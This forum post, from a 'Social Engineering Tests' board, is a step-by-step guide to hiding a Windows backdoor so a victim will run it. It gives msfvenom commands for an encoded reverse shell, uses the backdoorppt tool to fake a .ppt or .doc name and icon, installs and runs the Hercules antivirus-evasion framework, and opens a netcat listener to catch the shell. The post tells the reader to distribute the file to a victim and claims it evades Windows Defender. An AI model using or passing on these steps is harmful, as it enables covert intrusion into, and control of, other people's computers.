Concealing | Obfuscate | Bypass a Payload on Windows 8 - 10

Social Engineering Testing
User avatar
TheVikingsofDW
Posts: 283
Joined: Thu Feb 01, 2024 5:54 pm
Location: Budapest

Concealing | Obfuscate | Bypass a Payload on Windows 8 - 10

Postby TheVikingsofDW » Thu Feb 29, 2024 1:47 am

INTRODUCTION

One of the necessities that may arise is the discreet concealment of a backdoor, thereby instilling confidence in the victim regarding the file's integrity, prompting its execution.

To produce payloads, we employ various methodologies. For instance, the utilization of msfvenom facilitates their creation. Through the Hercules framework, we have the capability to generate payloads that enable us to circumvent diverse antivirus systems. Nevertheless, these payloads manifest as .exe files, potentially incurring user apprehension and reluctance to execute them.

One of the functionalities inherent to Windows, which is enabled by default, is the concealment of file extensions for recognised file types. This functionality permits the alteration of a file's name by appending two extensions, thereby concealing solely the latter one. Consequently, this practice misleads the end user into believing they are accessing a non-executable file when, in actuality, it's executable. To ilustrate, if we were to create a payload named "backdoor.exe", a simple modification to "backdoor.doc.exe", would suffice. Subsequently, within the file explorer, the victim would only perceive "backdoor.doc". Furthermore, attention must be given to the icon display, necessitating alteration to reflect a .doc format in reality.

This method is applicable in cases where the user has not altered the default setting to conceal file extensions. In practice, the majority of end-users tend not to modify this configuration. Naturally, should you have made adjustments, to it, identifying the file becomes a straightforward task.

HOW CAN WE SOLVE THIS?

To address this matter, within the realm of BlackArch, we possess the backdoorppt utility. This particular tool leverages resourcehacker and ruby to accomplish our objective: altering the file icon and concealing the extension, thereby leading the end user to perceive it as an Office document. Notably, while absent from the standard distribution of Kali Linux, this tool remains functional.

METHOD FOR CONCEALING A PAYLOAD

1. Clone the project:

Code: Select all

git clone https://github.com/r00t-3xp10it/backdoorppt
cd backdoorppt

2. By default, the system utilises the ruby option to conceal the extension; however, it doesn't alter the icon. Should there be a necessity to modify the icon, one must amend the configuration file and designate RESOURCEHACKER_BYPASS to YES.
3. We proceed to generate a payload:

Code: Select all

msfvenom -a x86 -platform windows -p windows/shell/reverse_t***** LHOST-(here put your IP) LPORT-1234 -b «\x00» -e x86/shikata_ga_nai -f exe -o /tmp/document.exe

4. Execute the script:

Code: Select all

./backdoorppt.sh

5. The system will verify the prerequisites and, in the event of any deficiencies, proceed with their installation. Given its compatibility with Debian systems, on Kali Linux, the dependencies ought to be seamlessly integrated. Typically, all necessary components should already be present.
Subsequently, a prompt will emerge, prompting us to specify the location of the executable file.
6. Once this task is completed, it requests the ultimate designation of the file. Ex. business
7. When the task is completed, it becomes apparent that within the file explorer, the designation manifests as "busines*****e.ppt", whereas in the terminal, it presents itself as "business?tpp.exe".
8. All that remains is for the file to be distributed and for the victim to open it on the Windows system.

METHOD FOR OBFUSCATE AND BYPASS ANTIVIRUS

By solely employing the aforementioned method, we shall achieve the desired file display on Windows; nevertheless, antivirus software shall identify the payload. This approach proves ineffective on systems equipped with antivirus protection.

One resolution to this issue involves not only concealing the executable but also obfuscating the payload to circumvent antivirus detection. To achive this, we shall employ Hercules, a tool specifically crafted for such endeavours.

1. Install Hercules:

Code: Select all

git clone https://github.com/EgeBalci/HERCULES
 cd HERCULES
 apt-get install golang-go
 export GOPATH=$HOME && go get github.com/fatih/color
 go run Setup.go

2. Once completed, we shall proceed to generate the payload:

Code: Select all

./HERCULES

3. Choose option 1 followed by selecting the payload to be utilised.
4. Enter your Kali's IP and Port.
5. Once this is done, it asks for the name of the executable and will leave it in the user's home. Now we only need to test the executable in Windows.
To open a session, once executed in Windows, from our Kali it will be enough to execute:

Code: Select all

nc -l -p 4444

And we will get our Shell.

Certainly, we can utilise the tool discussed for concealing a payload to obfuscate the extension, thereby facilitating the user in the execution of the file.

Windows Defender, present in both Windows 8 and Windows 10, fails to identify the aforementioned payload, even when concealed by an obscured extension. Furthermore, whether compressed or descompressed, this payload eludes detection by some antivirus software suites.

Code: Select all

___  _____      __
| _ )/ __\ \    / /
| _ \ (__ \ \/\/ /
|___/\___| \_/\_/

----- TheVikingsOfDW -----
A Proud Staff Member Of BCW

Return to “Social Engineering Tests”